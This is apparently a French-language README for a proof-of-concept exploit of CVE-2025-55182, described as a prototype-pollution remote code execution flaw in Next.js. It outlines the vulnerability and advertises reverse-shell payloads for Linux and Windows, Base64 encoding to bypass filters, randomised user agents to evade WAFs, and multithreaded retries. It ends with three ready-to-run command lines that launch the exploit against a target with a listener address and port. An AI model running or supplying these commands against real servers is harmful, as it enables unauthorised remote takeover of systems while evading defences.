
PoC pour CVE-2025-55182
CVE-2025-55182 est une vulnérabilité critique de pollution de prototype dans nextjs qui permet une exécution de code à distance via un assainissement incorrect des entrées dans le mécanisme de gestion des requêtes du framework. Tout cela se produit parce que nextjs fait confiance aux objets JSON comme un débutant naïf.
1) Pollution de prototype dans l'analyse des requêtes : nextjs assainit incorrectement les objets pouvant polluer la chaîne de prototypes
2) Désérialisation non sécurisée : le framework permet aux objets JSON de modifier les prototypes d'objets de base
3) rce via child_process en polluant la chaîne de prototypes : une fois la chaîne polluée, on peut détourner la logique et faire exécuter des commandes au serveur
npm create [email protected] vuln
1) Payloads de shell inversé : shells inversés Linux/Win
2) Encodage Base64 pour contourner les filtres
3) Détection automatique du système d'exploitation
4) User agents aléatoires pour esquiver les WAF
5) Boucles de réessai en cas d'échec avec backoff exponentiel
6) Multithreading pour des tentatives d'exploitation concurrentes pour la fiabilité
python exp_v2.py target 192.168.1.69 9001 --base64
python exploit.py target 192.168.1.69 9001 --retries 5 --threads 3
python exploit.py target.com 192.168.1.69 9001 --no-spoof